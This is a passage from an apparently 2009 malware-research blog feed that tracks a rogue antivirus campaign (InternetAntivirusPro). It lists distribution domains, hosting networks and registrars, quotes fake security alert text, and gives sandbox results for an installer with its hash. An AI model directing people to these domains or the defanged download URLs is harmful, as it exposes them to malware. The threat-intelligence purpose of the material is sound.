Ukraine&lt;br /&gt;&lt;b&gt;Joint Multimedia Cable Network&lt;/b&gt;  in Ukraine&lt;br /&gt;  &lt;b&gt;NTColo Networks&lt;/b&gt; in Ukraine&lt;br /&gt;  &lt;b&gt;Plitochnik Lux LTD&lt;/b&gt; in Ukraine&lt;br /&gt;  &lt;b&gt;Coloquest&lt;/b&gt; in US&lt;br /&gt;  &lt;b&gt;Netelligent Hosting Services Inc&lt;/b&gt; in US&lt;br /&gt;  and some other in China,  Moldavia.&lt;br /&gt;  IPs, AS and network used can be found on this blog.&lt;br /&gt;&lt;br /&gt;-------------&lt;br /&gt; New sites used&lt;br /&gt;&lt;br /&gt;on March 28: slot4scan.com, scan4fuse.com, list4scan.com, scan4home.com, gotimescan.com&lt;br /&gt;on March 29: mainscan6.com, scan4plus.info, scan4open.com&lt;br /&gt;&lt;br /&gt;on March 30: &lt;br /&gt;&lt;br /&gt;logscan6.com&lt;br /&gt;scan4way.com [redirection by gostepscan.com]&lt;br /&gt;5scanav.com and scan5plus.com [redirection by gowithscan.com]&lt;br /&gt;new4scan.info,scan4live.info&lt;br /&gt;&lt;br /&gt;April:&lt;br /&gt;&lt;br /&gt;best4scan.info, best6scan.info,pro4scan.info,scanline6.com, scan6log.com, scan6main.com, scan6now.com,zpmuwbtqqwkw.net&lt;br /&gt;&lt;a rel="dofollow" href="http://malware-web-threats.blogspot.com/2009/03/internetantiviruspro-spyware-spread-new.html" title="Black Hat SEO and Rogue Antivirus"&gt;Analysis here&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;-------------&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Related article: &lt;a href="http://www.pandasupport.net/up/Rogue/RogueAV.pdf"&gt;The rash of rogue av&lt;/a&gt; (PDF)&lt;br /&gt;&lt;br /&gt;Related article about McColo Business:&lt;br /&gt;Similar network at UltraNet Ltd in Lavtia&lt;br /&gt;&lt;a href="http://hostexploit.com/downloads/Hostexploit Cyber Crime USA v 2.0 1108.pdf" target="_blank"&gt;HostExploit’s Cyber Crime Series&lt;/a&gt; (PDF)&lt;/p&gt;&lt;p&gt;The list on your right hand side are latest websites used in this malware campaign. (Updated daily)&lt;br /&gt;&lt;br /&gt;Some interesting links about malicious traffic at DATORU EXPRESS SERVISS - ZlKon in Latvia &lt;br /&gt;Pages related to the same attack. (Included some other problems, SPAM, botnet etc...)&lt;br /&gt;&lt;br /&gt;December  15, 2008: &lt;br /&gt;FakeAV and Codecs&lt;br /&gt;&lt;a href="http://realsecurity.wordpress.com/2008/12/15/sources-of-badness-zlkon/"&gt;http://realsecurity.wordpress.com/2008/12/15/sources-of-badness-zlkon/&lt;/a&gt; &lt;br /&gt;&lt;br /&gt;December   19, 2008: &lt;br /&gt;SPAM IP Detected&lt;br /&gt;&lt;a href="http://forums.pligg.com/general-help/16374-spam-ip-94-247-2-29-kill.html"&gt;http://forums.pligg.com/general-help/16374-spam-ip-94-247-2-29-kill.html&lt;/a&gt; &lt;br /&gt;&lt;a href="http://www.projecthoneypot.org/ip_94.247.2.29"&gt;http://www.projecthoneypot.org/ip_94.247.2.29&lt;/a&gt; &lt;br /&gt;&lt;br /&gt;McAfee  Avert Labs Blog&lt;br /&gt;Monday January 5, 2009&lt;br /&gt;Explanation of the so-called “Traffic Management System” - Inside The Malicious  Traffic Business&lt;br /&gt;&lt;a href="http://www.avertlabs.com/research/blog/index.php/2009/01/05/inside-the-malicious-traffic-business/"&gt;http://www.avertlabs.com/research/blog/index.php/2009/01/05/inside-the-malicious-traffic-business/&lt;/a&gt; &lt;br /&gt;We also have an complete example &lt;a href="http://malware-web-threats.blogspot.com/2009/03/black-hat-seo-pdf-malware-campaign.html"&gt;here&lt;/a&gt;. From the visitor to the legitimate infected website (with logs, screenshot, ips and analysis of the malicious website as well as the technic used. i.e: SUTRA traffic redirection, PDF exploit to inject backdoors etc..)&lt;br /&gt;&lt;br /&gt;Zeus Tracker&lt;br /&gt;&lt;a href="https://zeustracker.abuse.ch/monitor.php?host=94.247.3.211"&gt;https://zeustracker.abuse.ch/monitor.php?host=94.247.3.211&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Wednesday  January 7, 2009 &lt;br /&gt;Google Code Project Abused by Spammers&lt;br /&gt;&lt;a href="http://www.avertlabs.com/research/blog/index.php/2009/01/07/google-code-project-abused-by-spammers/"&gt;http://www.avertlabs.com/research/blog/index.php/2009/01/07/google-code-project-abused-by-spammers/&lt;/a&gt; &lt;br /&gt;&lt;br /&gt;January  19, 2009&lt;br /&gt;Inaccurate whois details&lt;br /&gt;&lt;a href="http://msmvps.com/blogs/spywaresucks/archive/2009/01/21/1663955.aspx"&gt;http://msmvps.com/blogs/spywaresucks/archive/2009/01/21/1663955.aspx&lt;/a&gt; &lt;br /&gt;&lt;br /&gt;January  2009&lt;br /&gt;&lt;a href="http://voices.washingtonpost.com/securityfix/2009/01/troubled_ukrainian_host_sideli.html"&gt;http://voices.washingtonpost.com/securityfix/2009/01/troubled_ukrainian_host_sideli.html&lt;/a&gt; &lt;br /&gt;Paragraph:Sunbelt's Jordan said those responsible for DNSChanger appear to have begun  moving to a new base of operations over the past few weeks, to a network in  Latvia, called &amp;quot;Zlkon.lv.&amp;quot;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://ddanchev.blogspot.com/2009/02/diverse-portfolio-of-fake-security.html"&gt;http://ddanchev.blogspot.com/2009/02/diverse-portfolio-of-fake-security.html&lt;/a&gt; &lt;br /&gt;&lt;a href="http://ddanchev.blogspot.com/2009/02/template-ization-of-malware-serving.html"&gt;http://ddanchev.blogspot.com/2009/02/template-ization-of-malware-serving.html&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Paragraph from the  ddanchev.blogspot.com:&lt;br /&gt;&lt;/p&gt;Interestingly, within the mirrored copy now  tweaked and distributed for free using free image hosting services as  infrastructure provider for the layout, there are also leftovers from the  original campaign template that they mirrored - which ultimately leads us to  DATORU EXPRESS SERVISS Ltd (AS12553 PCEXPRESS-AS) or zlkon.lv In the wake of  UkrTeleGroup Ltd's demise -- don't pop the corks just yet since the revenues  they've been generating for the past several years will make it much less  painful -- a significant number of UkrTeleGroup customer, of course under  domains, have been generating quite some malicious activity at zlkon.lv for a while.&lt;br /&gt;&lt;br /&gt;January  25, 2009&lt;br /&gt;Rogue software - FakeAV&lt;br /&gt;&lt;a href="http://pandalabs.pandasecurity.com/archive/New-Rogue_3A00_-Total-Defender.aspx"&gt;http://pandalabs.pandasecurity.com/archive/New-Rogue_3A00_-Total-Defender.aspx&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;February 5, 2009&lt;br /&gt;Similar attack with  the same added code between like &amp;lt;!-- ad --&amp;gt; &amp;lt;!-- /ad --&amp;gt; &lt;br /&gt;(&lt;a href="http://malware-web-threats.blogspot.com/2009/03/web-poisoning-search-engine-ranking.html"&gt;Same code here&lt;/a&gt;)&lt;br /&gt;&lt;a href="http://www.aladdin.com/AircBlog/post/2009/02/The-latest-undetected-malweb-by-RBN.aspx"&gt;http://www.aladdin.com/AircBlog/post/2009/02/The-latest-undetected-malweb-by-RBN.aspx&lt;/a&gt;&lt;p&gt;  Other: &lt;a href="http://www.aladdin.com/AircBlog/post/2009/02/Iraq's-embassy-in-Tehran-website-compromised-by-hackers.aspx"&gt;http://www.aladdin.com/AircBlog/post/2009/02/Iraq's-embassy-in-Tehran-website-compromised-by-hackers.aspx&lt;/a&gt; &lt;br /&gt;&lt;br /&gt;Wednesday  February 25, 2009&lt;br /&gt;Google Trends Abused to Serve Malware&lt;br /&gt;&lt;a href="http://www.avertlabs.com/research/blog/index.php/2009/02/25/google-trends-abused-to-serve-malware/"&gt;http://www.avertlabs.com/research/blog/index.php/2009/02/25/google-trends-abused-to-serve-malware/&lt;/a&gt;&lt;br /&gt;  &lt;br /&gt;  &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/div&gt;&lt;script type="text/javascript"&gt;var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));&lt;/script&gt;&lt;script type="text/javascript"&gt;try {var pageTracker = _gat._getTracker("UA-7584836-2");pageTracker._trackPageview();} catch(err) {}&lt;/script&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8434732598810973720-3751716486830821803?l=malware-web-threats.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8434732598810973720/posts/default/3751716486830821803'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8434732598810973720/posts/default/3751716486830821803'/><link rel='alternate' type='text/html' href='http://malware-web-threats.blogspot.com/2009/03/black-hat-seo-and-rogue-antivirus.html' title='Black Hat SEO and Rogue Antivirus'/><author><name>Malware-Web-Threats</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='26' src='http://1.bp.blogspot.com/_9YOi_bjoDL4/Sbbw4VMblvI/AAAAAAAAAAY/wX9tbwSSbI4/S220/virusdoctor.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_9YOi_bjoDL4/Sc0wT27hu1I/AAAAAAAAANg/3Of3Qi_YVgs/s72-c/FTC_ConsumerAlert.jpg' height='72' width='72'/></entry><entry><id>tag:blogger.com,1999:blog-8434732598810973720.post-8285373162434627527</id><published>2009-03-27T01:45:00.000-07:00</published><updated>2009-04-02T06:45:09.371-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='scanslot4.com'/><category scheme='http://www.blogger.com/atom/ns#' term='new4scan.info'/><category scheme='http://www.blogger.com/atom/ns#' term='mainscan6.com'/><category scheme='http://www.blogger.com/atom/ns#' term='internetantiviruspro'/><category scheme='http://www.blogger.com/atom/ns#' term='scan4open.com'/><category scheme='http://www.blogger.com/atom/ns#' term='open4scan.com'/><category scheme='http://www.blogger.com/atom/ns#' term='scan4fuse.com'/><category scheme='http://www.blogger.com/atom/ns#' term='logscan6.com'/><category scheme='http://www.blogger.com/atom/ns#' term='scanlist4.com'/><title type='text'>InternetAntivirusPro Spyware spread new variants</title><content type='html'>&lt;div style="font-size:10px; font-family:Tahoma, Geneva, sans-serif"&gt;&lt;table width="560" height="1291" border="0" cellpadding="0" cellspacing="0" style="font-size:12px"&gt;&lt;tr&gt;&lt;td colspan="2" valign="top" height="833"&gt;&lt;p&gt;&lt;span style="font-size:14px; font-weight:bold"&gt;InternetAntivirusPro Spyware spread new variants&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Some new websites appear to distribute a new variant of the fake antispyware InternetAntivirusPro &lt;br /&gt;Detected as WinWebSecurity or FakeSpyGuard. 2 or 3 new sites are registered every day. &lt;br /&gt;&lt;/p&gt;&lt;table width="266" height="31" border="1" cellpadding="0" cellspacing="0" bordercolor="#CCCCCC"&gt;&lt;tr&gt;&lt;td width="266" height="29"&gt;READ &lt;a rel="dofollow" href="http://malware-web-threats.blogspot.com/2009/03/black-hat-seo-and-rogue-antivirus.html" title="Black Hat SEO and Rogue Antivirus" style="color: #333"&gt;THIS page&lt;/a&gt; if you need more information&lt;br /&gt;&lt;/td&gt;  &lt;/tr&gt;&lt;/table&gt;&lt;br /&gt;Site screenshot retreived from &lt;a href="http://malware-web-threats.blogspot.com/2009/03/systemsecurity2009-spread-new-variants.html"&gt;this page&lt;/a&gt; (same domains)&lt;br /&gt;A  list can be found &lt;a href="http://malware-web-threats.blogspot.com/2009/03/web-poisoning-search-engine-ranking.html" target="_blank"&gt;here&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;bestscan5.com [March 31]&lt;br /&gt;fuse4scan.com [March 27]&lt;br /&gt;gotimescan.com [march 28]&lt;br /&gt;list4scan.com [march 28]&lt;br /&gt;logscan6.com [March 26]&lt;br /&gt;mainscan6.com [March 27]&lt;br /&gt;scan4fuse.com [March 28]&lt;br /&gt;scan4open.com [March 28]&lt;br /&gt;scan4plus.info [March 29]&lt;br /&gt;slot4scan.com [March 28]&lt;br /&gt;new4scan.info [March 30]&lt;br /&gt;scan4live.info [March 30]  &lt;br /&gt;scan4pro.info [March 31]&lt;br /&gt;&lt;br /&gt;April new:&lt;br /&gt;&lt;br /&gt;best4scan.info [April 1]&lt;br /&gt;best6scan.info [April 2] &lt;br /&gt;pro4scan.info [April 1] &lt;br /&gt;scanline6.com [April 2] &lt;br /&gt;scan6log.com [April 1] &lt;br /&gt;scan6main.com [April 1]&lt;br /&gt;scan6now.com [April 1]&lt;br /&gt;zpmuwbtqqwkw.net [April 1] &lt;br /&gt;&lt;br /&gt;-----------&lt;br /&gt;Other ACTIVE: &lt;br /&gt;&lt;br /&gt;Registrar NETEARTH ONE, INC. DBA NETEARTH&lt;br /&gt;Domain: 5scanav.com, scan5av.com&lt;br /&gt;Registration Service Provided By: SELLOUT.NAME&lt;br /&gt; ----------&lt;br /&gt;Created on January 14 2009&lt;br /&gt;&lt;br /&gt;Registrar: REGTIME LTD&lt;br /&gt;Domain: scan5plus.com&lt;br /&gt;DNS Servers:   NS1.SCAN5PLUS.COM  NS2.SCAN5PLUS.COM&lt;br /&gt;----------  &lt;br /&gt;Created on March 16 2009&lt;br /&gt;&lt;br /&gt;Registrar: UK2 GROUP LTD.&lt;br /&gt;Domain: logscan6.com&lt;br /&gt;DNS Servers:   NS1.SITELUTIONS.COM  NS2.SITELUTIONS.COM&lt;br /&gt;Registration Service Provided By: SELLOUT.NAME&lt;br /&gt;-------------&lt;br /&gt;Created on March 23 2009:&lt;br /&gt;  &lt;br /&gt;Registrar: UK2 GROUP LTD.&lt;br /&gt;Domain: scan4way.com&lt;br /&gt; DNS Servers used are NS1.DNSEXIT.COM  - NS2.DNSEXIT.COM&lt;br /&gt;Registration Service Provided By: SELLOUT.NAME  &lt;br /&gt;-------------&lt;br /&gt;&lt;br /&gt;&lt;u&gt;&lt;b&gt;Fake Trojan-IM.Win32.Faker.a Alert - Internet Antivirus Pro Warning&lt;/b&gt;&lt;/u&gt;:&lt;br /&gt;&lt;br /&gt;Trojan-IM.Win32.Faker.a&lt;br /&gt;Virus.Win32.Faker.a&lt;br /&gt;Trojan.PSW.BAT.Cunter&lt;br /&gt;&lt;br /&gt;&lt;a href="http://4.bp.blogspot.com/_9YOi_bjoDL4/Sciy6mezUxI/AAAAAAAAAK4/V9c1o5Er5tE/s1600-h/scan4any.com-Fake.Trojan-IM.Win32.Faker.a.jpg"&gt;&lt;img style="cursor:pointer; cursor:hand;width: 320px; height: 211px;" src="http://4.bp.blogspot.com/_9YOi_bjoDL4/Sciy6mezUxI/AAAAAAAAAK4/V9c1o5Er5tE/s320/scan4any.com-Fake.Trojan-IM.Win32.Faker.a.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5316696079942767378" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://3.bp.blogspot.com/_9YOi_bjoDL4/Sciy7OIwpGI/AAAAAAAAALI/_BGG_wSxuX0/s1600-h/scan4lite.com-Fake.Virus.Trojan-IM.Win32.Faker.a.jpg"&gt;&lt;img style="cursor:pointer; cursor:hand;width: 320px; height: 278px;" src="http://3.bp.blogspot.com/_9YOi_bjoDL4/Sciy7OIwpGI/AAAAAAAAALI/_BGG_wSxuX0/s320/scan4lite.com-Fake.Virus.Trojan-IM.Win32.Faker.a.jpg" border="0" alt="scan4lite.com Fake message: Trojan-IM.Win32.Faker.a"id="BLOGGER_PHOTO_ID_5316696090587735138" /&gt;&lt;/a&gt;&lt;a href="http://2.bp.blogspot.com/_9YOi_bjoDL4/Sciy63GEd8I/AAAAAAAAALA/EpRjBFpVvOI/s1600-h/scan4lite.com-Fake.Trojan-IM.Win32.Faker.a.jpg"&gt;&lt;br /&gt;          &lt;br /&gt;&lt;img style="cursor:pointer; cursor:hand;width: 320px; height: 235px;" src="http://2.bp.blogspot.com/_9YOi_bjoDL4/Sciy63GEd8I/AAAAAAAAALA/EpRjBFpVvOI/s320/scan4lite.com-Fake.Trojan-IM.Win32.Faker.a.jpg" border="0" alt="scan4lite.com Fake message: Trojan-IM.Win32.Faker.a"id="BLOGGER_PHOTO_ID_5316696084402436034" /&gt;&lt;/a&gt;&lt;a href="http://4.bp.blogspot.com/_9YOi_bjoDL4/Sciy6mezUxI/AAAAAAAAAK4/V9c1o5Er5tE/s1600-h/scan4any.com-Fake.Trojan-IM.Win32.Faker.a.jpg"&gt;&lt;/a&gt;&lt;br /&gt;&lt;a href="http://2.bp.blogspot.com/_9YOi_bjoDL4/Sci1TUKaQsI/AAAAAAAAALg/7e_gAT6ammE/s1600-h/scan4lite.com-scanner-virus.jpg"&gt;&lt;img style="cursor:pointer; cursor:hand;width: 320px; height: 64px;" src="http://2.bp.blogspot.com/_9YOi_bjoDL4/Sci1TUKaQsI/AAAAAAAAALg/7e_gAT6ammE/s320/scan4lite.com-scanner-virus.jpg" border="0" alt="scan4lite.com Virus"id="BLOGGER_PHOTO_ID_5316698703545385666" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;u&gt;&lt;b&gt;Fake messages&lt;/b&gt;&lt;/u&gt;:&lt;br /&gt;&lt;br /&gt;&lt;a href="http://1.bp.blogspot.com/_9YOi_bjoDL4/Sci0qhlo3CI/AAAAAAAAALY/Cy-EoZQJCTo/s1600-h/scan4lite.com-Fake.Message2.jpg"&gt;&lt;img style="cursor:pointer; cursor:hand;width: 320px; height: 265px;" src="http://1.bp.blogspot.com/_9YOi_bjoDL4/Sci0qhlo3CI/AAAAAAAAALY/Cy-EoZQJCTo/s320/scan4lite.com-Fake.Message2.jpg" border="0" alt="scan4lite.com Fake Security Warning Message"id="BLOGGER_PHOTO_ID_5316698002774613026" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://3.bp.blogspot.com/_9YOi_bjoDL4/Sci0p2lhGPI/AAAAAAAAALQ/NhfZPlRyOK4/s1600-h/scan4lite.com-Fake.Message.jpg"&gt;&lt;img style="cursor:pointer; cursor:hand;width: 320px; height: 81px;" src="http://3.bp.blogspot.com/_9YOi_bjoDL4/Sci0p2lhGPI/AAAAAAAAALQ/NhfZPlRyOK4/s320/scan4lite.com-Fake.Message.jpg" border="0" alt="scan4lite.com Fake Security Warning Message"id="BLOGGER_PHOTO_ID_5316697991231379698" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;u&gt;&lt;b&gt;Fake Windows Security Alert&lt;/b&gt;&lt;/u&gt;:&lt;br /&gt;&lt;br /&gt;Admess.Trojan&lt;br /&gt;zserv.Transponder.Trojan&lt;br /&gt;Wstart.TrojanDownloader&lt;br /&gt;Email-Worm.Win32.Net&lt;br /&gt;Email-Worm.Win32.Myd&lt;br /&gt;Trojan-Downloader.Win &lt;br /&gt;&lt;br /&gt;&lt;/p&gt;&lt;table width="343" border="1" style="border:solid 1px #CCC" cellspacing="0" cellpadding="0"&gt;&lt;tr&gt;&lt;td width="339" height="117"&gt;&lt;i&gt;Serious security and privacy threats found on your computer. &lt;br /&gt;&lt;br /&gt;It may damage your files or steal your personal and financial information.&lt;br /&gt;&lt;br /&gt;Click &amp;quot;OK&amp;quot; to start downloading CRITICAL security software update.&lt;/i&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;Other template:&lt;br /&gt;&lt;br /&gt;&lt;a href="http://2.bp.blogspot.com/_9YOi_bjoDL4/ScYG1T7kYmI/AAAAAAAAAKI/EN_lMv9QkwY/s1600-h/Fake.Admess.Trojan-protectionskim.com.jpg"&gt;&lt;img style="cursor:pointer; cursor:hand;width: 320px; height: 266px;" src="http://2.bp.blogspot.com/_9YOi_bjoDL4/ScYG1T7kYmI/AAAAAAAAAKI/EN_lMv9QkwY/s320/Fake.Admess.Trojan-protectionskim.com.jpg" border="0" alt="Fake Admess.Trojan - WinWebSecurity"id="BLOGGER_PHOTO_ID_5315943923110404706" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a href="http://1.bp.blogspot.com/_9YOi_bjoDL4/ScYG1PBU1kI/AAAAAAAAAKA/5om4WC0g4qI/s1600-h/protectionskim.com.SystemSecurity-WinWebSecurity.jpg"&gt;&lt;img style="cursor:pointer; cursor:hand;width: 320px; height: 266px;" src="http://1.bp.blogspot.com/_9YOi_bjoDL4/ScYG1PBU1kI/AAAAAAAAAKA/5om4WC0g4qI/s320/protectionskim.com.SystemSecurity-WinWebSecurity.jpg" border="0" alt="Fake Scanner - WinWebSecurity"id="BLOGGER_PHOTO_ID_5315943921792374338" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Fake Scanner:&lt;br /&gt;&lt;br /&gt;&lt;a href="http://1.bp.blogspot.com/_9YOi_bjoDL4/ScZCxX-PCOI/AAAAAAAAAKw/187fq9kgpAQ/s1600-h/wsc_vista.png"&gt;&lt;img style="cursor:pointer; cursor:hand;width: 320px; height: 226px;" src="http://1.bp.blogspot.com/_9YOi_bjoDL4/ScZCxX-PCOI/AAAAAAAAAKw/187fq9kgpAQ/s320/wsc_vista.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5316009826173520098" /&gt;&lt;/a&gt;&lt;a href="http://3.bp.blogspot.com/_9YOi_bjoDL4/ScZCxFfuBjI/AAAAAAAAAKo/5r1YjdgewUM/s1600-h/wwwsecurityread.com.jpg"&gt;&lt;br /&gt;&lt;img style="cursor:pointer; cursor:hand;width: 320px; height: 282px;" src="http://3.bp.blogspot.com/_9YOi_bjoDL4/ScZCxFfuBjI/AAAAAAAAAKo/5r1YjdgewUM/s320/wwwsecurityread.com.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5316009821213689394" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;u&gt;&lt;b&gt;Fake messages&lt;/b&gt;&lt;/u&gt;:&lt;br /&gt;&lt;br /&gt;&lt;a href="http://4.bp.blogspot.com/_9YOi_bjoDL4/ScYG1KCDgUI/AAAAAAAAAJ4/l3ssQsk5O3E/s1600-h/protectionskim.com.popup-2.jpg"&gt;&lt;img style="cursor:pointer; cursor:hand;width: 320px; height: 70px;" src="http://4.bp.blogspot.com/_9YOi_bjoDL4/ScYG1KCDgUI/AAAAAAAAAJ4/l3ssQsk5O3E/s320/protectionskim.com.popup-2.jpg" border="0" alt="Fake Scanner - SystemSecurity message - WinWebSecurity"id="BLOGGER_PHOTO_ID_5315943920453255490" /&gt;&lt;/a&gt; &lt;a href="http://1.bp.blogspot.com/_9YOi_bjoDL4/ScYG0hBCn6I/AAAAAAAAAJw/sB6iQCaGVHM/s1600-h/protectionskim.com.popup-1.jpg"&gt;&lt;img style="cursor:pointer; cursor:hand;width: 320px; height: 75px;" src="http://1.bp.blogspot.com/_9YOi_bjoDL4/ScYG0hBCn6I/AAAAAAAAAJw/sB6iQCaGVHM/s320/protectionskim.com.popup-1.jpg" border="0" alt="Fake Scanner - SystemSecurity message - WinWebSecurity"id="BLOGGER_PHOTO_ID_5315943909443149730" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;  &lt;td height="25" colspan="2" valign="top" style="background:url(http://2.bp.blogspot.com/_9YOi_bjoDL4/ScMyEsYqlmI/AAAAAAAAAHY/aZXlFPDe0HU/s320/table_bg.gif) repeat-x;height:19x;padding:7px;"&gt;&lt;b&gt;Analysis of logscan6.com, mainscan6.com, logscan6.com:&lt;/b&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td width="25" height="208" valign="top"&gt;&lt;br /&gt;&lt;/td&gt;&lt;td width="547"&gt;&lt;br /&gt;&lt;table width="524" border="0" cellspacing="0" cellpadding="0"&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&lt;b&gt;Site URLs&lt;/b&gt;:&lt;/td&gt;&lt;td colspan="2"&gt;hxxp://www.mainscan6.com/22/?uid=keyin&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td colspan="2"&gt;hxxp://www.mainscan6.com/download/install.php&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td colspan="2"&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td width="20"&gt;&amp;nbsp;&lt;/td&gt;&lt;td width="91"&gt;&lt;b&gt;File info&lt;/b&gt;:&lt;/td&gt;&lt;td colspan="2"&gt;install.exe&lt;/td&gt;&lt;td width="18"&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td colspan="2"&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;File size&lt;/td&gt;&lt;td colspan="2"&gt;40448 bytes&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;MD5&lt;/td&gt;&lt;td colspan="2"&gt;a63bd2a45057c5f589d8e75b429b02a8&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td colspan="2"&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&lt;b&gt;ThreatExpert:&lt;/b&gt;&lt;/td&gt;&lt;td colspan="2"&gt;&lt;a href="http://www.threatexpert.com/report.aspx?md5=a63bd2a45057c5f589d8e75b429b02a8" target="_blank"&gt;Report for InternetAntivirusPro - Rootkit.Win32.TDSS&lt;/a&gt;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&lt;b&gt;Anubis:&lt;/b&gt;&lt;/td&gt;&lt;td colspan="2"&gt;&lt;a href="http://anubis.iseclab.org/?action=result&amp;amp;task_id=126455a5c13b94bd40161b4e4ab7bcfe9" target="_blank"&gt;Report&lt;/a&gt;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&lt;b&gt;VirusTotal&lt;/b&gt;:&lt;/td&gt;&lt;td colspan="2"&gt;&lt;a href="http://www.virustotal.com/analisis/fdcc854d9c312f91f37208be069599cc" target="_blank"&gt;Report&lt;/a&gt;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td colspan="2"&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;First received&lt;/td&gt;&lt;td colspan="2"&gt;03.27.2009 06:42:43 (CET)&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;Results&lt;/td&gt;&lt;td colspan="2"&gt;5/39 (12.50%)&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td colspan="2"&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;Alias:&lt;/td&gt;&lt;td width="238"&gt;&lt;span style="color:#FF0000"&gt;Trojan-Downloader.Win32.Renos.AQ!IK&lt;/span&gt;&lt;/td&gt;&lt;td width="157"&gt;a-squared&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&lt;span style="color:#FF0000"&gt;Suspicious file&lt;/span&gt;&lt;/td&gt;&lt;td&gt;eSafe&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;td&gt;&lt;span 